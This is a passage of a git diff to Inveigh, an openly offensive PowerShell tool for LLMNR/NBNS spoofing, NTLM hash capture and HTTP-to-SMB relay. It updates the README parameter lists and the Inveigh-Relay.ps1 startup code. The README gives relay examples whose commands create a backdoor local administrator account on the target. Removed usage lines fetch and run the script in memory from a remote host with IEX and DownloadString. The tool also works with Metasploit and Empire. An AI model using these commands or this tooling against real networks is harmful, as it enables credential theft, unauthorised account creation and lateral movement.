WPAD: Specify a hostname for NBNS spoofing. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. -* __NBNSPause__ Default = Disabled: (Integer) Specify the number of seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. -* __NBNSTTL__ - Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. +* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host. +* __SpooferTarget__ - IP address to target for brute force NBNS spoofing. +* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. +* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. +* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. +* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. +* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. +* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. +* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. +* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. +* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. +* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. +* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. +* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: Specify a TCP IP address for the HTTP listener. -* __HTTPPort__ - Default = 80: Specify a TCP port for the HTTP listener. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. -* __HTTPBasicRealm__ - Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. -* __HTTPResponse__ - Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __WPADIP__ - Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __HTTPIP__ - Default = Any: IP address for the HTTP listener. +* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. +* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. +* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. +* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. +* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. +* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunCount__ - Default = Unlimited: (Integer) Set the number of captures to perform before auto-exiting. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ### Invoke-InveighRelay @@ -127,16 +207,27 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * HTTP/HTTPS to SMB NTLMv2 relay with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS * Granular control of console and file output -* Can be executed as either a standalone function or through Invoke-Inveigh + +##### Examples: +* To execute with basic options: + Invoke-Inveigh -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" + +* To execute with and only perform SMB relay with the 'Administrator' account: + Invoke-InveighUnprivileged -HTTP N + Invoke-InveighRelay -SMBRelayTarget 192.168.1.50 -SMBRelayCommand "net user Inveigh Summer2016 /add && net localgroup administrators Inveigh /add" -SMBRelayUsernames Administrator + +##### Screenshot: +![inveigh-relay](https://cloud.githubusercontent.com/assets/5897462/18420526/9991a758-7842-11e6-90b2-9d519ff03c28.png) ##### Parameters: * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSCertAppID__ - Specify a valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __Challenge__ - Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. +* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. +* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. +* __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. * __SMBRelayTarget__ - IP address of system to target for SMB relay. * __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. * __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. @@ -146,82 +237,20 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must also be enabled. +* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunTime__ - Default = Unlimited: (Integer) Set the run time duration in minutes. +* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +##### Notes: +* Ensure that any needed HTTP, HTTPS ports are open within any local firewall on the host system. +* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. + ### Support Functions -* __Get-Inveigh__ - Get queued console output -* __Get-InveighCleartext__ - Get all captured cleartext credentials -* __Get-InveighLog__ - Get log entries -* __Get-InveighNTLMv1__ - Get all or unique (-unique) captured NTLMv1 challenge/response hashes -* __Get-InveighNTLMv2__ - Get all or unique (-unique) captured NTLMv2 challenge/response hashes -* __Watch-Inveigh__ - Enable real time console output * __Clear-Inveigh__ - Clear Inveigh data from memory +* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames * __Stop-Inveigh__ - Stop all running Inveigh functions +* __Watch-Inveigh__ - Enable real time console output -## Miscellaneous Notes -* The local LLMNR/NBNS services do not need to be disabled on the host system. -* LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -* Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. -* Ensure that any needed LMMNR,NBNS,SMB,HTTP,HTTPS ports are open within any local firewall on the host system. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. - -## System Requirements -* Tested minimums are PowerShell 2.0 and .NET 3.5 - -## Usage -* To import with Import-Module: - Import-Module ./Inveigh.psd1 - -* To import using dot source method: - . ./Inveigh.ps1 - . ./Inveigh-BruteForce.ps1 - . ./Inveigh-Relay.ps1 - -* To load into memory using Invoke-Expression: - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") - -## Examples -* To execute with default settings: - Invoke-Inveigh - -* To load and execute with one line: - Import-Module ./Inveigh.ps1;Invoke-Inveigh - -* To execute with parameters (Use 'Get-Help -parameter * Invoke-Inveigh' for a full list of parameters): - Invoke-Inveigh -IP 'local IP' -SpooferIP 'local or remote IP' -LLMNR Y/N -NBNS Y/N -NBNSTypes 00,03,20,1B -HTTP Y/N -HTTPS Y/N -SMB Y/N -Repeat Y/N -ConsoleOutput Y/N -FileOutput Y/N -OutputDir 'valid folder path' - -* To execute with SMB relay enabled through Invoke-Inveigh: - Invoke-Inveigh -SMBRelay Y -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute SMB relay with only Invoke-InveighRelay: - Invoke-InveighRelay -SMBRelayTarget 'valid SMB target IP' -SMBRelayCommand "valid command to run on target" - -* To execute Inveigh-BruteForce against a target: - Invoke-InveighRelay -SpooferTarget 'remote or local target IP' - -## Included In -* PowerShell Empire - https://github.com/PowerShellEmpire/Empire -* PS>Attack - https://github.com/jaredhaight/psattack -* p0wnedShell - https://github.com/Cn33liz/p0wnedShell - -## Special Thanks -* Anyone that posted .NET packet sniffing examples. -* Responder - https://github.com/SpiderLabs/Responder -* Impacket - https://github.com/CoreSecurity/impacket - -## Screenshots -Invoke-Inveigh execution with real time console and file output enabled -![inveighv1](https://cloud.githubusercontent.com/assets/5897462/12239354/4bb8a01a-b856-11e5-8a1e-5c0ebbb1ff35.PNG) - -Retrieval of captured NTLM2 challenge/response hashes with Get-InveighNTLMv2 -![inveigh2](https://cloud.githubusercontent.com/assets/5897462/10326313/abde41d8-6c67-11e5-91b8-0c55271ba326.png) - -HTTP to SMB Relay -![inveigh3](https://cloud.githubusercontent.com/assets/5897462/10326314/b2de540a-6c67-11e5-8627-fe5d27018dc3.png) - -Module import and execution through one of Ben Turner and Dave Hardy's Metasploit Interactive PowerShell Session payloads -![inveigh5](https://cloud.githubusercontent.com/assets/5897462/10354363/53e73784-6d2d-11e5-8509-9bb7f3feab88.png) +##### Screenshot: +![inveigh-support](https://cloud.githubusercontent.com/assets/5897462/18420531/b1858e2e-7842-11e6-9f03-0e86ee704211.png) diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index f8ce03e..f766b71 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -22,23 +22,23 @@ the local store and attached to port 443. If the script does not exit gracefully in the cert store. .PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. +Valid application GUID for use with the ceriticate. .PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. +Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current +working directory and named Inveigh.pfx. .PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be +Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random +challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. .PARAMETER MachineAccounts Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER WPADAuth -Default = NTLM: (Anonymous,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. Setting -to Anonymous can prevent browser login prompts. +Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. .PARAMETER SMBRelayTarget IP address of system to target for SMB relay. @@ -51,11 +51,12 @@ Default = All Usernames: Comma separated list of usernames to use for relay atta domain\username format. .PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. +Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on +target. .PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay -target after each packet is sent. +Default = No Timeout: (Integer) Duration in seconds that Inveigh will wait for a reply from the SMB relay target +after each packet is sent. .PARAMETER ConsoleOutput Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to @@ -73,22 +74,24 @@ running Inveigh Relay through a shell that does not return other output streams. various yellow warning messages if enabled. .PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must -also be enabled. +Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be +enabled. .PARAMETER RunTime -(Integer) Set the run time duration in minutes. +(Integer) Run time duration in minutes. .PARAMETER ShowHelp Default = Enabled: (Y/N) Enable/Disable the help messages at startup. .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire +Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. +0 = None, 1 = Metasploit/Meterpreter, 2 = Empire .EXAMPLE +Invoke-Inveigh -HTTP N Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay +Perform SMB relay with a command that will create a local administrator account on the SMB relay target. .LINK @@ -99,26 +102,26 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][Int]$RunTime="", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable = "Y", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", + [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][Array]$SMBRelayUsernames = "", + [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout = "", + [parameter(Mandatory=$false)][Int]$RunTime = "", [parameter(Mandatory=$true)][String]$SMBRelayCommand = "", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", + [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF", + [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d", [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -127,6 +130,11 @@ if ($invalid_parameter) throw "$($invalid_parameter) is not a valid parameter." } +if($inveigh.HTTP -or $inveigh.HTTPS) +{ + throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module." +} + if(!$SMBRelayTarget) { throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" @@ -157,31 +165,33 @@ if(!$inveigh) $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList } -if($inveigh.HTTP_listener.IsListening) +if($inveigh.HTTP_listener.IsListening -and !$inveigh.running) { $inveigh.HTTP_listener.Stop() $inveigh.HTTP_listener.Close() } -if(!$inveigh.running) +if(!$inveigh.running -or !$inveigh.unprivileged_running) { $inveigh.console_queue = New-Object System.Collections.ArrayList $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.certificate_application_ID = $HTTPSCertAppID $inveigh.certificate_thumbprint = $HTTPSCertThumbprint - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.console_output = $false $inveigh.console_input = $true $inveigh.file_output = $false $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $Inveigh.challenge = $Challenge + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" } $inveigh.relay_running = $true @@ -206,7 +216,7 @@ else $inveigh.output_stream_only = $false } -if($Tool -eq 1) # Metasploit Interactive Powershell +if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension { $inveigh.tool = 1 $inveigh.output_stream_only = $true @@ -229,30 +239,58 @@ else } # Write startup messages -if(!$inveigh.running) +$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null +$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + +$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + +if($firewall_status) { - $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null + $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null - $firewall_status = netsh advfirewall show allprofiles state | where {$_ -match 'ON'} + $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2 + $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}" - if($firewall_status) + if($firewall_powershell) { - $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null + $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null } +} + +if($HTTP -eq 'Y') +{ + + $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80 - if($HTTP -eq 'Y') + if($HTTP_port_check) { - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port 80") > $null } else { - $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null } - if($HTTPS -eq 'Y') +} +else +{ + $inveigh.HTTP = $false + $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null +} + +if($HTTPS -eq 'Y') +{ + + $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443 + + if($HTTPS_port_check) + { + $inveigh.HTTP = $true + $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port 443") > $null + } + else { try @@ -268,31 +306,35 @@ if(!$inveigh.running) $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null + $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null } catch { $certificate_store.Close() $HTTPS="N" $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Install Error") > $null } } - else - { - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null - } + +} +else +{ + $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null +} + +if($inveigh.HTTP -or $inveigh.HTTPS) +{ if($Challenge) { - $Inveigh.challenge = $challenge $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null } if($MachineAccounts -eq 'N') { - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null + $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null $inveigh.machine_accounts = $false } else @@ -300,84 +342,93 @@ if(!$inveigh.running) $inveigh.machine_accounts = $true } - $inveigh.status_queue.Add("Force WPAD Authentication = $WPADAuth") > $null + $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null - if($ConsoleOutput -eq 'Y') - { - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null - $inveigh.console_output = $true - } - else - { +} - if($inveigh.tool -eq 1) - { - $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null - } - else - { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null - } +$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null - } +if($SMBRelayUsernames) +{ - if($FileOutput -eq 'Y') + if($SMBRelayUsernames.Count -eq 1) { - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null - $inveigh.status_queue.Add("Output Directory = $output_directory") > $null - $inveigh.file_output = $true + $inveigh.status_queue.Add("SMB Relay Username = " + ($SMBRelayUsernames -join ",")) > $null } else { - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null + $inveigh.status_queue.Add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ",")) > $null } - if($RunTime -eq 1) +} + +if($SMBRelayAutoDisable -eq 'Y') +{ + $inveigh.status_queue.Add("SMB Relay Auto Disable = Enabled") > $null +} +else +{ + $inveigh.status_queue.Add("SMB Relay Auto Disable = Disabled") > $null +} + +if($SMBRelayNetworkTimeout) +{ + $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null +} + +if($ConsoleOutput -eq 'Y') +{ + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + $inveigh.console_output = $true +} +else +{ + + if($inveigh.tool -eq 1) { - $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null + $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null } - elseif($RunTime -gt 1) + else { - $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null + $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null } } -$inveigh.status_queue.Add("SMB Relay Enabled") > $null -$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null - -if($SMBRelayUsernames) +if($FileOutput -eq 'Y') { - if($SMBRelayUsernames.Count -eq 1) + if($inveigh.file_output) { - $inveigh.status_queue.Add("SMB Relay Username = " + $SMBRelayUsernames -join ",") > $null + $inveigh.file_output = $false } else { - $inveigh.status_queue.Add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",") > $null + $inveigh.file_output = $true } -} + $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null + $inveigh.status_queue.Add("Output Directory = $output_directory") > $null + $inveigh.file_output = $true -if($SMBRelayAutoDisable -eq 'Y') -{ - $inveigh.status_queue.Add("SMB Relay Auto Disable Enabled") > $null } else { - $inveigh.status_queue.Add("SMB Relay Auto Disable Disabled") > $null + $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null } 